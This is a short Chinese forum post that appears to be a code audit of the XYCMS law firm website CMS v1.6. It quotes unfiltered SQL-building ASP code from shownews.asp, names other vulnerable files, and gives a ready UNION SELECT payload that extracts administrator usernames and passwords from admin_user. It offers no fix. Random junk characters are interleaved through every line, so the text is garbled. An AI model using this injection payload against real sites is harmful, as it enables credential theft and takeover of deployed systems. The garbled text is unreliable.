前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
2 t+ e; j: @9 k W% T% u * D4 C1 O s! s% W3 f! ]$ D
淫荡分割线
6 t3 n4 t/ c$ m# k5 H1 D; t- r--------------------------------------------------------
: k2 x0 M6 |% ?6 v6 ~, [+ \* L b! z* e, O6 t' d
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
" n! } k" B& p' s0 q' _源码地址:http://down.chinaz.com/soft/29233.htm
4 z; y! M: `% O % O6 d6 j+ z# z. O" ] l b- j
漏洞文件:shownews.asp
0 f% U- r V( z* ?. O1 ?/ }" l- {漏洞代码:7-13行
- w# h% G2 P$ v7 [' v 7 `3 W0 W e/ G0 _2 W
% H! ~; E& Z: Z<% " w5 b" s6 g A; S L2 g% \8 W
id=request.QueryString("id")6 I+ ?# m1 l, o F- p& @
$ n3 O% C9 z$ j/ H
set snews=server.createobject("adodb.recordset") 8 ^7 c1 k3 s. t+ O! x: v/ N1 h( r2 w
exec="select * from [news] where id="&id
) r0 v+ ~: N8 A% l9 z( f0 rsnews.open exec,conn,1,1- y/ [) _. v" f! Z/ W9 ^6 ]
%>! g3 T# q+ S& P# L7 G
! M$ M" Z' b3 }5 v# d, M
& I9 t, Q" X$ O( h' M, i, O什么过滤都没有 直造成注入
9 y& P. y5 x; j, A( ?) Q( c 9 R8 s2 P) z6 U3 i% T# L* g
注入点:http://127.0.0.1:99/shownews.asp?id=xx
/ ^! e$ Q' A! Z4 s7 r4 v* ^ , t/ x4 b. T$ R
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找+ T8 ?: N' Q7 ^$ |$ X- `* F/ K
, \7 Q$ C) p+ E0 ?3 G
2 \; K& |; R& ^( Y2 m0 I: [8 q( a. R5 eexp: union select 1,admin,password,4,5,7 from admin_user
5 S$ f$ P) q# b+ [: b8 D
0 F+ `( h2 l& C5 P k7 R |